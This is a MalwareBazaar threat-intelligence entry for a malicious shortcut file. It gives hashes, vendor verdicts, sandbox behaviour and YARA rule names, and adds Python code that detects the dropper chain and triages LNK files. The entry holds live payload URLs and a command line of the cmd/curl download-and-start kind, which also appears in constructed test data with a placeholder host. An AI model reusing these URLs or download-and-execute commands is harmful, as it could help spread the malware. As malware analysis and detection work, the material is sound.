MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat: unknown


Vendor detections: 13



SHA256 hash: 5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883
SHA3-384 hash: b9547efa881fcc4d64b6210780889e4442c5fe83e48cf81f2ed3648ed18db70ee263341ab58650bfd4fef96d91782677
SHA1 hash: 66151352e0681a862ff32a6969c0f2ba85d47ff6
MD5 hash: 428af83aedf12392cf3c3b19c9119206
humanhash: red-johnny-table-utah
File name: Doc.lnk
File size: 2'940 bytes
First seen: 2025-12-17 12:34:59 UTC
Last seen: Never
File type: Shortcut (lnk)
MIME type: application/x-ms-shortcut
ssdeep: 24:8w/kJik3P2pAApA+/Tyhq3zGdhKSkGJ8R5Oe/E4I0lVmOdrab6B:8w/mf2FMGohMU45OgIvOZae
TLSH: T1E851F0246FEE8720D3714D3FECBAFB21C9B9B952E9A2CF6D0560404C1852940B835F2B
Magika: lnk
Reporter: smica83
Tags: lnk UKR

Intelligence


File Origin
Number of uploads: 1
Number of downloads: 75
Origin country: HU
Vendor Threat Intelligence
Malware configuration found for: LNK
Details: LNK (a command line and any observed URLs)
Verdict: Malicious
Score: 81.4%
Tags: infosteal obfuscate dropper sage
Result
Verdict: Malicious
File Type: LNK File - Malicious
Payload URLs
URL: https://telem3try.oooppppqqq9999.com:8443/files/pp.pdf&&start (File name: LNK File). The trailing "&&start" is the cmd.exe chaining operator and the next command, captured together with the URL by the extractor; it is not part of the URL path.
Behaviour: BlacklistAPI detected
Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: autorun cmd lolbin masquerade packed zero
Verdict: Malicious
File Type: lnk
First seen: 2025-12-16T11:24:00Z UTC
Last seen: 2025-12-18T12:48:00Z UTC
Hits: ~10
Detections: Trojan.WinLNK.Agent.sb, HEUR:Trojan.WinLNK.Agent.gen, HEUR:Trojan.Multi.GenBadur.genw
Result
Threat name: n/a
Detection: malicious
Classification: n/a
Score: 64 / 100
Signatures:
Multi AV Scanner detection for submitted file
Obfuscated command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Behaviour
Behavior Graph ID 1834768 (sample: Doc.lnk, start date: 17/12/2025, architecture: WINDOWS, score: 64). Process tree and network/file activity recovered from the graph:
cmd.exe (started from the LNK; signatures: starts blacklisted processes, multi-AV scanner detection, obfuscated command line, suspicious command line arguments)
  -> curl.exe: resolves telem3try.oooppppqqq9999.com, connects to 194.59.31.187:8443 (COMBAHTON combahton GmbH, DE) and to 127.0.0.1
  -> curl.exe: drops C:\Users\user\AppData\Local\Temp\t.exe (PE32+)
  -> Acrobat.exe -> AcroCEF.exe -> AcroCEF.exe: connects to 23.216.68.137 (AKAMAI-ASN1EU, United States)
  -> 2 other processes -> WerFault.exe
Verdict: Malware
YARA: 2 match(es)
Tags: Execution: CMD in LNK, LNK, LOLBin, LOLBin:cmd.exe, Malicious, T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1202 (Indirect Command Execution), T1204.002 (User Execution: Malicious File)
Threat name: Shortcut.Trojan.Generic
Status: Suspicious
First seen: 2025-12-16 23:32:00 UTC
File Type: Binary
AV detection: 9 of 36 (25.00%)
Threat level: 5/5
Result
Malware family: n/a
Score: 8/10
Tags: adware discovery persistence spyware
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Windows directory
Adds Run key to start application
Checks computer location settings
Executes dropped EXE
Downloads MZ/PE file
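The sandbox verdicts above describe one chain: cmd.exe launched from the shortcut, curl.exe fetching a decoy PDF and a PE into the user's Temp directory, the dropped executable running, and a Run key being written. The following is an added example (not MalwareBazaar's, a vendor's or the sample author's code) that correlates that chain in endpoint telemetry. The event records are constructed Sysmon-style dictionaries; EventID 1 is process creation, 11 file creation, 13 a registry value set. PIDs, the SID, the example.invalid host and the command lines are assumptions; the drop path is the one shown in the behaviour graph.

```python
"""Correlate process, file and registry events into the LNK-dropper chain:
cmd.exe from a shortcut -> downloader fetches a file -> that file executes
-> it writes a Run key. Added example; EVENTS are CONSTRUCTED records."""
import re

DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "wget.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_lnk_dropper_chain(events: list) -> list:
    """Return (rule, detail) alerts in the order the rules fire."""
    alerts = []
    procs = [e for e in events if e["EventID"] == 1]
    # Rule 1: cmd.exe whose parent is explorer.exe (what a double-clicked
    # shortcut looks like) spawns a known downloader with a URL on its command line.
    for cmd in procs:
        if basename(cmd["Image"]) != "cmd.exe" or basename(cmd["ParentImage"]) != "explorer.exe":
            continue
        for child in procs:
            if (child["ParentProcessId"] == cmd["ProcessId"]
                    and basename(child["Image"]) in DOWNLOADERS
                    and URL_RE.search(child["CommandLine"])):
                alerts.append(("cmd_spawns_downloader", child["CommandLine"]))
    # Rules 2 and 3 depend on event order: remember what downloaders wrote,
    # then flag execution of those files and Run-key persistence written by them.
    dropped = set()
    for ev in events:
        image = ev["Image"].lower()
        if ev["EventID"] == 11 and basename(image) in DOWNLOADERS:
            dropped.add(ev["TargetFilename"].lower())
        elif ev["EventID"] == 1 and image in dropped:
            alerts.append(("dropped_file_executed", ev["Image"]))
        elif ev["EventID"] == 13 and image in dropped and RUN_KEY_RE.search(ev["TargetObject"]):
            alerts.append(("run_key_persistence", ev["TargetObject"]))
    return alerts


TEMP_EXE = r"C:\Users\user\AppData\Local\Temp\t.exe"  # drop path from the behaviour graph
EVENTS = [  # CONSTRUCTED Sysmon-style telemetry; host, PIDs and SID are made up
    {"EventID": 1, "ProcessId": 100, "ParentProcessId": 1,
     "Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"EventID": 1, "ProcessId": 200, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c curl -o %TEMP%\pp.pdf '
                    r"https://example.invalid:8443/files/pp.pdf&&start %TEMP%\pp.pdf"},
    {"EventID": 1, "ProcessId": 201, "ParentProcessId": 200,
     "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl -o " + TEMP_EXE + " https://example.invalid:8443/files/t.exe"},
    {"EventID": 11, "ProcessId": 201, "Image": r"C:\Windows\System32\curl.exe",
     "TargetFilename": TEMP_EXE},
    {"EventID": 1, "ProcessId": 202, "ParentProcessId": 200,
     "Image": TEMP_EXE, "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": TEMP_EXE},
    {"EventID": 13, "ProcessId": 202, "Image": TEMP_EXE,
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                     r"\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": TEMP_EXE},
]

if __name__ == "__main__":
    for rule, detail in detect_lnk_dropper_chain(EVENTS):
        print(f"{rule}: {detail}")
```

Rule 1 alone fires on plenty of legitimate scripts that call curl from a batch file; it is the conjunction with a later execution of the downloaded file (rule 2) and persistence written by that file (rule 3) that turns the sequence into the dropper pattern the reports describe, so a production rule should require at least two of the three within one process tree.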

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: Download_in_LNK
Author: @bartblaze
Description: Identifies download artefacts in shortcut (LNK) files.
Rule name: Execution_in_LNK
Author: @bartblaze
Description: Identifies execution artefacts in shortcut (LNK) files.
Rule name: LNK_Malicious_Nov1
Author: Florian Roth (Nextron Systems)
Description: Detects a suspicious LNK file
Reference: https://www.virustotal.com/en/file/ee069edc46a18698fa99b6d2204895e6a516af1a306ea986a798b178f289ecd6/analysis/
Rule name: LNK_sospechosos
Author: Germán Fernández
Description: Detects suspicious .lnk files
Rule name: PDF_in_LNK
Author: @bartblaze
Description: Identifies Adobe Acrobat artefacts in shortcut (LNK) files. A PDF document is typically used as decoy in a malicious LNK.
Rule name: SUSP_LNK_CMD
Author: SECUINFRA Falcon Team
Description: Detects the reference to cmd.exe inside an lnk file, which is suspicious
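The matching rules above look for download, execution, cmd.exe and Acrobat artefacts in the shortcut's string data, and the vendor reports above recovered a command line of that shape (curl fetching a PDF, then "start"). The following is an added example (not MalwareBazaar's, a rule author's or a vendor's code) of the static side of that triage: a parser for the Shell Link header and StringData fields of an LNK file, followed by the same indicator checks over the reconstructed command line. The LNK bytes are constructed by build_lnk() and are not the Doc.lnk sample; the example.invalid host and the command line are assumptions shaped after the vendor report. The parser skips LinkTargetIDList and LinkInfo but does not parse ExtraData blocks, which a full triage tool (LECmd, pylnk3) would also inspect.

```python
"""Static triage of a Windows shortcut: parse the MS-SHLLINK header and
StringData, then look for download/execution artefacts in the command line.
Added example; the LNK bytes come from build_lnk() and are CONSTRUCTED."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the spawned console window out of sight

# StringData fields appear in this fixed order, each only if its flag is set
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of an LNK file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (LNK) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    fields = {"flags": flags, "show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # IDListSize (u16) followed by the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for bit, key in STRING_FIELDS:               # CountCharacters (u16) then the characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le", "replace")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


# A single '&' is legal inside a URL query string; a doubled '&&' is cmd.exe's
# chaining operator, so the URL stops there instead of swallowing "&&start".
URL_RE = re.compile(r"""https?://(?:[^\s"'<>|&]|&(?!&))+""")

INDICATORS = {
    "lolbin": re.compile(r"\b(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|forfiles)(\.exe)?\b", re.I),
    "downloader": re.compile(r"\b(curl|certutil|bitsadmin|wget)(\.exe)?\b|Download(String|File)", re.I),
    "chained_exec": re.compile(r"(&&|\|\||;)\s*(start|call)\b", re.I),
    "temp_drop": re.compile(r"%temp%|AppData\\Local\\Temp", re.I),
    "decoy_pdf": re.compile(r"\.pdf\b", re.I),
}


def triage(fields: dict) -> dict:
    """Reconstruct the command line of a parsed LNK and score it."""
    cmdline = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments")).strip()
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        hits.append("minimized_window")
    return {"command_line": cmdline, "indicators": sorted(hits), "urls": URL_RE.findall(cmdline)}


def build_lnk(arguments: str, rel_path: str = r"..\..\..\Windows\System32\cmd.exe",
              show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """CONSTRUCTED test input: a minimal Unicode LNK carrying only RELATIVE_PATH
    and COMMAND_LINE_ARGUMENTS (no IDList, LinkInfo or ExtraData)."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII",
                         0x4C, LNK_CLSID, flags, 0x80,   # HeaderSize, CLSID, LinkFlags, FILE_ATTRIBUTE_NORMAL
                         0, 0, 0,                         # creation / access / write FILETIMEs
                         0, 0, show_command,              # FileSize, IconIndex, ShowCommand
                         0, 0, 0, 0)                      # HotKey, Reserved1, Reserved2, Reserved3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (rel_path, arguments))
    return header + body


if __name__ == "__main__":
    # Constructed command line in the shape of the vendor report (placeholder host)
    sample = build_lnk(r"/c curl -o %TEMP%\pp.pdf https://example.invalid:8443/files/pp.pdf&&start %TEMP%\pp.pdf")
    print(triage(parse_lnk(sample)))
```

Reconstructing the command line from relative_path plus arguments is a heuristic: when the shortcut carries only a LinkTargetIDList, the target lives in the item IDs rather than in StringData, so a parser that stops at StringData will miss a bare target and report an empty command line. Treating "no target recovered but HasArguments set" as its own indicator covers that case.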

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Shortcut (lnk) 5f8d7e2784e81a45eb4ce0f788110c4e0d84c6224a1041ae7390fd3ba8ff1883 (this sample)

Comments



commented on 2025-12-18 10:14:12 UTC

Payload URL:
https://telem3try.oooppppqqq9999.com:8443/files/surf3ce.exe